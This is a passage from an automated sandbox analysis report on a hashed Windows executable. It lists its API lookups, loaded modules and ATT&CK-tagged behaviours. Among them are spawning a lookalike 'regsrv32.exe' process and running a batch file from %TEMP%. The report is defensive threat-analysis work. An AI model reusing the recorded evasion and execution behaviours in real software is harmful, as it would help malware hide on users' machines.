00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005940)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006004)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004236)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004236)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"17001800cc5af275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"12001300b65af275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"0f001000f259f275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"100011002c5bf275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"0d000e008e58f275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"0c000d001c5bf275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"0b000c007259f275@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03ee16c@ADVAPI32.dll\"\n \"0e000f00703fe16c@ADVAPI32.dll\"\n \"0e000f00cc3fe16c@ADVAPI32.dll\"\n \"11001200b447e16c@ADVAPI32.dll\"\n \"110012004848e16c@ADVAPI32.dll\"\n \"120013008c48e16c@ADVAPI32.dll\"\n \"12001300e448e16c@ADVAPI32.dll\"\n \"14001500386ee16c@ADVAPI32.dll\"\n \"14001500506ee16c@ADVAPI32.dll\"\n \"14001500686ee16c@ADVAPI32.dll\"\n \"17001800806ee16c@ADVAPI32.dll\"\n \"0d000e00986ee16c@ADVAPI32.dll\"\n \"11001200a86ee16c@ADVAPI32.dll\"\n \"11001200bc6ee16c@ADVAPI32.dll\"\n \"0d000e004466e16c@WININET.dll\"\n \"0d000e00b466e16c@WININET.dll\"\n \"10001100ec66e16c@WININET.dll\"\n \"100011009067e16c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\regsrv32.exe\" - (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2473.bat\"\" - (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c50000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"KERNEL32\" at base 76260000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"SHELL32.DLL\" at base 76780000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"OLE32.DLL\" at base 763b0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"ADVAPI32.DLL\" at base 75b90000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"KERNEL32.DLL\" at base 76260000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"PROFAPI.DLL\" at base 756a0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71a50000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 757e0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"WS2_32.DLL\" at base 77690000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"WINHTTP.DLL\" at base 716c0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75050000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75040000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"WININET.DLL\" at base 75cd0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"IPHLPAPI.DLL\" at base 739f0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75530000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"CRYPTBASE.DLL\" at base 75580000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74110000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"PROPSYS.DLL\" at base 74150000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"COMCTL32.DLL\" at base 74550000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"OLEAUT32.DLL\" at base 766d0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"CLBCATQ.DLL\" at base 75f80000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74150000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"NTMARTA.DLL\" at base 74af0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76340000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"APPHELP.DLL\" at base 75530000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e5a0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76780000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76580000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"SECUR32.DLL\" at base 753c0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76260000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"SETUPAPI.DLL\" at base 759f0000\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75720000\n \"regsrv32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c50000\n \"regsrv32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"regsrv32.exe\" loaded module \"KERNEL32\" at base 76260000\n \"regsrv32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"regsrv32.exe\" loaded module 